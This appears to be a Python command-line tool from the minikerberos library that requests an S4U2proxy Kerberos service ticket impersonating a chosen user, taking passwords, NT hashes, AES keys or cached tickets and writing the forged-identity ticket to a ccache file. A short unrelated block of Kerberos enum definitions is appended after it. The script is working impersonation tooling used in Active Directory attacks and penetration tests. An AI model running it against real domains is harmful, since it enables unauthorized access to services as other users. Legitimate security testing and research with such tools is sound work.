#
# Author:
#  Tamas Jos (@skelsec)
#
import os
import logging
import asyncio

from minikerberos import logger
from minikerberos.common.url import KerberosClientURL, kerberos_url_help_epilog
from minikerberos.aioclient import AIOKerberosClient
from minikerberos.common.spn import KerberosSPN

import pprint

async def amain(args):
	cu = KerberosClientURL.from_url(args.kerberos_connection_url)
	ccred = cu.get_creds()
	target = cu.get_target()

	service_spn = KerberosSPN.from_target_string(args.spn)
	target_user = KerberosSPN.from_user_email(args.targetuser)
	
	if not ccred.ccache:
		logger.debug('Getting TGT')
		client = AIOKerberosClient(ccred, target)
		await client.get_TGT()
		logger.debug('Getting ST')
		tgs, encTGSRepPart, key = await client.getST(target_user, service_spn)
	else:
		logger.debug('Getting TGS via TGT from CCACHE')
		for tgt, key in ccred.ccache.get_all_tgt():
			try:
				logger.info('Trying to get SPN with %s' % '!'.join(tgt['cname']['name-string']))
				client = AIOKerberosClient.from_tgt(target, tgt, key)

				tgs, encTGSRepPart, key = await client.getST(target_user, service_spn)
				logger.info('Sucsess!')
			except Exception as e:
				logger.debug('This ticket is not usable it seems Reason: %s' % e)
				continue
			else:
				break

	client.ccache.to_file(args.ccache)	
	logger.info('Done!')


def main():
	import argparse
	
	parser = argparse.ArgumentParser(description='Gets an S4U2proxy ticket impersonating given user', formatter_class=argparse.RawDescriptionHelpFormatter, epilog = kerberos_url_help_epilog)
	parser.add_argument('kerberos_connection_url', help='the kerberos target string in the following format <domain>/<username>/<secret_type>:<secret>@<domaincontroller-ip>')
	parser.add_argument('spn', help='the service principal in format <service>/<server-hostname>@<domain> Example: cifs/fileserver.test.corp@TEST.corp for a TGS ticket to be used for file access on server "fileserver". IMPORTANT: SERVER\'S HOSTNAME MUST BE USED, NOT IP!!!')
	parser.add_argument('targetuser', help='')
	parser.add_argument('ccache', help='ccache file to store the TGT ticket in')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	
	args = parser.parse_args()
	if args.verbose == 0:
		logger.setLevel(logging.WARNING)
	elif args.verbose == 1:
		logger.setLevel(logging.INFO)
	else:
		logger.setLevel(1)

	asyncio.run(amain(args))
	
	
if __name__ == '__main__':
	main()


import enum

class KerberosSocketType(enum.Enum):
	UDP = enum.auto()
	TCP = enum.auto()	

class KerberosSecretType(enum.Enum):
	PASSWORD = 'PASSWORD'
	PW = 'PW'
	PASS = 'PASS'
	NT = 'NT'
	AES = 'AES' #keeping this here for user's secret-type specification and compatibility reasons
	AES128 = 'AES128'
	AES256 = 'AES256'
	RC4 = 'RC4'
	DES = 'DES'
	DES3 = 'DES3'
	TDES = 'TDES'
	CCACHE = 'CCACHE'
	KEYTAB = 'KEYTAB'